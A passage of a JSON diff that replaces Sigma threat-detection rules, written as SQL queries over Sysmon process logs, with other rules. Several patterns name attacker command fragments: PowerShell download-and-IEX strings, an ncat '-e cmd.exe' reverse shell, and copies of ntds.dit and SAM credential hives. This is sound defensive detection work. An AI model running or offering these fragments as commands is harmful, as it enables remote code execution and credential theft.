using the 'reg.exe' utility", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "System administrator usage", - "Anti virus products" + "Legitimate import of keys" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND Image LIKE '%msi%' ESCAPE '\\' AND Image LIKE '%tmp' ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND IntegrityLevel = 'System')) AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\') OR ((ParentImage LIKE 'C:\\\\ProgramData\\\\Sophos\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\Google\\\\Update\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% import %' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_always_install_elevated_windows_installer.yml" + "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml" }, { - "title": "Unusual Parent Process For Cmd.EXE", - "id": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", - "status": "experimental", - "description": "Detects suspicious parent process for cmd.exe", - "author": "Tim Rauch", + "title": "Potential Defense Evasion Via Binary Rename", + "id": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", + "status": "test", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ctfmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\epad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\FlashPlayerUpdateService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\GoogleUpdate.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jucheck.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jusched.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sihost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sppsvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\unsecapp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wergmgr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WUDFHost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('Cmd.Exe', 'CONHOST.EXE', '7z.exe', 'WinRAR.exe', 'wevtutil.exe', 'net.exe', 'net1.exe', 'netsh.exe', 'InstallUtil.exe') AND NOT ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\WinRAR.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_unusual_parent.yml" + "filename": "proc_creation_win_renamed_binary.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", - "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "title": "PowerShell Web Download and Execution", + "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Scripts or tools that download files and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" - }, - { - "title": "File Encoded To Base64 Via Certutil.EXE", - "id": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", - "status": "test", - "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-encode%' ESCAPE '\\' OR CommandLine LIKE '%/encode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_encode.yml" + "filename": "proc_creation_win_powershell_download_iex.yml" }, { - "title": "File Download Via Bitsadmin To An Uncommon Target Folder", - "id": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", + "title": "ImagingDevices Unusual Parent/Child Processes", + "id": "f11f2808-adb4-46c0-802a-8660db50fa99", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND Image LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" + "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" }, { - "title": "HackTool - KrbRelay Execution", - "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", - "status": "experimental", - "description": "Detects the use of KrbRelay, a Kerberos relaying tool", + "title": "HackTool - SecurityXploded Execution", + "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", + "status": "stable", + "description": "Detects the execution of SecurityXploded Tools", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1558.003" + "attack.t1555" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Company = 'SecurityXploded' OR Image LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_krbrelay.yml" + "filename": "proc_creation_win_hktl_secutyxploded.yml" }, { - "title": "Copying Sensitive Files with Credential Data", - "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", - "status": "test", - "description": "Files with well-known filenames (sensitive files with credential data) copying", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious Modification Of Scheduled Tasks", + "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "status": "experimental", + "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003", - "car.2013-07-001", - "attack.s0404" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" + "filename": "proc_creation_win_schtasks_change.yml" }, { - "title": "Greenbug Espionage Group Indicators", - "id": "3711eee4-a808-4849-8a14-faf733da3612", + "title": "Non-privileged Usage of Reg or Powershell", + "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", "status": "test", - "description": "Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec", - "author": "Florian Roth (Nextron Systems)", + "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", + "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", "tags": [ - "attack.g0049", - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1105", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%:\\\\ProgramData\\\\adobe\\\\Adobe.exe' ESCAPE '\\' OR Image LIKE '%:\\\\ProgramData\\\\oracle\\\\local.exe' ESCAPE '\\' OR Image LIKE '%\\\\revshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\infopagesbackup\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%:\\\\ProgramData\\\\comms\\\\comms.exe' ESCAPE '\\') OR (CommandLine LIKE '%-ExecutionPolicy Bypass -File%' ESCAPE '\\' AND CommandLine LIKE '%\\\\msf.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%infopagesbackup%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ncat%' ESCAPE '\\' AND CommandLine LIKE '%-e cmd.exe%' ESCAPE '\\') OR (CommandLine LIKE '%system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill%' ESCAPE '\\' OR CommandLine LIKE '%-nop -w hidden -c $k=new-object%' ESCAPE '\\' OR CommandLine LIKE '%[Net.CredentialCache]::DefaultCredentials;IEX %' ESCAPE '\\' OR CommandLine LIKE '% -nop -w hidden -c $m=new-object net.webclient;$m%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass whoami%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass netstat -a%' ESCAPE '\\') OR CommandLine LIKE '%L3NlcnZlcj1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_greenbug_may20.yml" + "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" }, { - "title": "Shells Spawned by Java", - "id": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", + "title": "DllUnregisterServer Function Call Via Msiexec.EXE", + "id": "84f52741-8834-4a8c-a413-2eb2269aa6c8", "status": "experimental", - "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", + "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", + "author": "frack113", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1218.007" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT (ParentImage LIKE '%build%' ESCAPE '\\' AND CommandLine LIKE '%build%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND (CommandLine LIKE '% /z %' ESCAPE '\\' OR CommandLine LIKE '% -z %' ESCAPE '\\') AND CommandLine LIKE '%.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_java_susp_child_process_2.yml" + "filename": "proc_creation_win_msiexec_dll.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp", - "id": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", + "title": "Suspicious Outlook Child Process", + "id": "208748f7-881d-47ac-a29c-07ea84bf691d", "status": "test", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "author": "frack113", + "description": "Detects a suspicious process spawning from an Outlook process.", + "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Compress-Archive %' ESCAPE '\\' AND CommandLine LIKE '% -Path %' ESCAPE '\\' AND CommandLine LIKE '% -DestinationPath %' ESCAPE '\\' AND CommandLine LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_zip_compress.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" }, { - "title": "Verclsid.exe Runs COM Object", - "id": "d06be4b9-8045-428b-a567-740a26d9db25", + "title": "Winnti Malware HK University Campaign", + "id": "3121461b-5aa0-4a41-b910-66d25524edbb", "status": "test", - "description": "Detects when verclsid.exe is used to run COM object via GUID", - "author": "Victor Sergeev, oscd.community", + "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", + "author": "Florian Roth (Nextron Systems), Markus Neis", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR OriginalFileName = 'verclsid.exe') AND (CommandLine LIKE '%/S%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentImage LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND Image LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Test.exe' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND Image LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_verclsid_runs_com.yml" + "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" }, { - "title": "Suspicious Schtasks Schedule Type With High Privileges", - "id": "7a02e22e-b885-4404-b38b-1ddc7e65258a", + "title": "PUA - CsExec Execution", + "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", "status": "experimental", - "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.resource_development", + "attack.t1587.001", "attack.execution", - "attack.t1053.005" + "attack.t1569.002" ], "falsepositives": [ - "Some installers were seen using this method of creation unfortunately. Filter them in your environment" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\') AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" ], - "filename": "proc_creation_win_schtasks_schedule_type_system.yml" + "filename": "proc_creation_win_pua_csexec.yml" }, { - "title": "Potential Privilege Escalation To LOCAL SYSTEM", - "id": "207b0396-3689-42d9-8399-4222658efc99", - "status": "experimental", - "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Compress Data and Lock With Password for Exfiltration With 